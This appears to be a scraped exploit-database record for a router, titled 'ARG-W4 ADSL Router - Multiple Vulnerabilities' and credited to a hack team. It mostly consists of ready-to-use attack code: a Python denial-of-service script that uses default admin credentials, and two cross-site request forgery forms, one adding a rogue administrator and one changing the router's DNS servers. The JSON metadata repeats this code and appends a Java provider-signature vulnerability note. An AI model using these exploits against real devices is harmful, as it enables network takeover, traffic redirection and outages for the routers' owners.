ID 1337DAY-ID-26507Type zdtReporter Mojtaba MobhaMModified 2016-12-12T00:00:00
Description
Exploit for hardware platform in category web applications
# Exploit Title: ARG-W4 ADSL Router - Multiple Vulnerabilities
# Date: 2016-12-11
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba MobhaM
# Tested on: Windows AND Linux
# Exploit Demo : http://persian-team.ir/showthread.php?tid=196
1 - Denial of Service
#!/usr/bin/python
import urllib2
import urllib
site=raw_input("Enter Url : ")
site=site+"/form2Upnp.cgi"
username='admin'
password='admin'
p = urllib2.HTTPPasswordMgrWithDefaultRealm()
p.add_password(None, site, username, password)
handler = urllib2.HTTPBasicAuthHandler(p)
opener = urllib2.build_opener(handler)
urllib2.install_opener(opener)
post = {'daemon':' ','ext_if':'pppoe+1','submit.htm?upnp.htm':'Send'}
data = urllib.urlencode(post)
try:
html = urllib2.urlopen(site,data)
print ("Done ! c_C")
except:
print ("Done ! c_C")
2-1 Cross-Site Request Forgery (Add Admin)
<html>
<body>
<form action="http://192.168.1.1/form2userconfig.cgi" method="POST">
USER:<input type="text" name="username" value="mobham" />
<input type="hidden" name="privilege" value="2" />
PWD:<input type="text" name="newpass" value="mobham" />
RPWD:<input type="texr" name="confpass" value="mobham" />
<input type="hidden" name="adduser" value="Add" />
<input type="hidden" name="hiddenpass" value="" />
<input type="hidden" name="submit.htm?userconfig.htm" value="Send" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
2-2 Cross-Site Request Forgery (Change DNS)
<html>
<body>
<form action="http://192.168.1.1/form2Dns.cgi" method="POST">
<input type="hidden" name="dnsMode" value="1" />
DNS<input type="text" name="dns1" value="2.2.2.2" />
DNS 2<input type="text" name="dns2" value="1.1.1.1" />
DNS 3<input type="text" name="dns3" value="" />
<input type="hidden" name="submit.htm?dns.htm" value="Send" />
<input type="hidden" name="save" value="Apply Changes" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# 0day.today [2018-03-19] #
{"sourceData": "# Exploit Title: ARG-W4 ADSL Router - Multiple Vulnerabilities\r\n# Date: 2016-12-11\r\n# Exploit Author: Persian Hack Team\r\n# Discovered by : Mojtaba MobhaM \r\n# Tested on: Windows AND Linux\r\n# Exploit Demo : http://persian-team.ir/showthread.php?tid=196\r\n \r\n1 - Denial of Service\r\n \r\n#!/usr/bin/python\r\nimport urllib2\r\nimport urllib\r\n \r\nsite=raw_input(\"Enter Url : \")\r\nsite=site+\"/form2Upnp.cgi\"\r\nusername='admin'\r\npassword='admin'\r\np = urllib2.HTTPPasswordMgrWithDefaultRealm()\r\np.add_password(None, site, username, password)\r\nhandler = urllib2.HTTPBasicAuthHandler(p)\r\nopener = urllib2.build_opener(handler)\r\nurllib2.install_opener(opener)\r\n \r\npost = {'daemon':' ','ext_if':'pppoe+1','submit.htm?upnp.htm':'Send'}\r\ndata = urllib.urlencode(post)\r\ntry:\r\n html = urllib2.urlopen(site,data)\r\n print (\"Done ! c_C\")\r\nexcept:\r\n print (\"Done ! c_C\")\r\n \r\n2-1 Cross-Site Request Forgery (Add Admin)\r\n \r\n<html>\r\n <body>\r\n <form action=\"http://192.168.1.1/form2userconfig.cgi\" method=\"POST\">\r\n USER:<input type=\"text\" name=\"username\" value=\"mobham\" />\r\n <input type=\"hidden\" name=\"privilege\" value=\"2\" />\r\n PWD:<input type=\"text\" name=\"newpass\" value=\"mobham\" />\r\n RPWD:<input type=\"texr\" name=\"confpass\" value=\"mobham\" />\r\n <input type=\"hidden\" name=\"adduser\" value=\"Add\" />\r\n <input type=\"hidden\" name=\"hiddenpass\" value=\"\" />\r\n <input type=\"hidden\" name=\"submit.htm?userconfig.htm\" value=\"Send\" />\r\n <input type=\"submit\" value=\"Submit request\" />\r\n </form>\r\n </body>\r\n</html>\r\n \r\n2-2 Cross-Site Request Forgery (Change DNS)\r\n \r\n<html>\r\n <body>\r\n <form action=\"http://192.168.1.1/form2Dns.cgi\" method=\"POST\">\r\n <input type=\"hidden\" name=\"dnsMode\" value=\"1\" />\r\n DNS<input type=\"text\" name=\"dns1\" value=\"2.2.2.2\" />\r\n DNS 2<input type=\"text\" name=\"dns2\" value=\"1.1.1.1\" />\r\n DNS 3<input type=\"text\" name=\"dns3\" value=\"\" />\r\n <input type=\"hidden\" name=\"submit.htm?dns.htm\" value=\"Send\" />\r\n <input type=\"hidden\" name=\"save\" value=\"Apply Changes\" />\r\n <input type=\"submit\" value=\"Submit request\" />\r\n </form>\r\n </body>\r\n</html>\n\n# 0day.today [2018-03-19] #", "history": [], "description": "Exploit for hardware platform in category web applications", "sourceHref": "https://0day.today/exploit/26507", "reporter": "Mojtaba MobhaM", "href": "https://0day.today/exploit/description/26507", "type": "zdt", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "2bebc19b72bd95e98513647d258e7828"}, {"key": "href", "hash": "b85cdc02f98d6422b14c6eb957a0663d"}, {"key": "modified", "hash": "0e7987255134b6b62c7ac9e7befc20ca"}, {"key": "published", "hash": "0e7987255134b6b62c7ac9e7befc20ca"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "22199c92ec48ba055dc0101f7e859d80"}, {"key": "sourceData", "hash": "96cd34c3f745c757726daa0e28482235"}, {"key": "sourceHref", "hash": "785020d8d8130f076a8d9990e494c93a"}, {"key": "title", "hash": "477d19cda78ad9db387b1d0715d4aa7e"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "viewCount": 9, "references": [], "lastseen": "2018-03-19T05:25:28", "published": "2016-12-12T00:00:00", "objectVersion": "1.3", "cvelist": [], "id": "1337DAY-ID-26507", "hash": "76f77e3744568f4535e3fbc125b8da413c966126fe5d429939215617a80b48f7", "modified": "2016-12-12T00:00:00", "title": "ARG-W4 ADSL Router - Multiple Vulnerabilities", "edition": 1, "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 0.4, "vector": "NONE", "modified": "2018-03-19T05:25:28"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:26507"]}], "modified": "2018-03-19T05:25:28"}, "vulnersScore": 0.4}}
{"securityvulns": [{"lastseen": "2018-08-31T11:10:40", "bulletinFamily": "software", "description": "An attacker can add a cryptographic provider containing cipher\r\nimplementation signed by an untrusted certificate. The attacker can\r\nalso create his or her own jurisdiction policy files signed by an\r\nuntrusted certificate.\r\nIn order to achieve this, the attacker must first of all add a fake\r\ncryptographic provider (with index 1) with special\r\nCertificateFactory.X.509 implementation. Such provider is not required\r\nto be signed. This implementation can return attacker's own untrusted\r\ncertificate instead of one of the old JCE code signing certificates.\r\nThis vulnerability is caused by using CertificateFactory#getInstance\r\nwithout specifying "SUN" provider in the code which is responsible for\r\nproviders (and jurisdiction policy) signature verification.\r\nThis applies to all versions of Java HotSpot SE 5 and 6.\r\nMore details and code samples here:\r\nhttp://java.zacheusz.eu/provider-signature-verif-vuln-2/273/\r\n Regards,\r\n Zacheusz Siedlecki", "modified": "2011-06-11T00:00:00", "published": "2011-06-11T00:00:00", "id": "SECURITYVULNS:DOC:26507", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26507", "title": "Java HotSpot Cryptographic Provider signature verification vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}
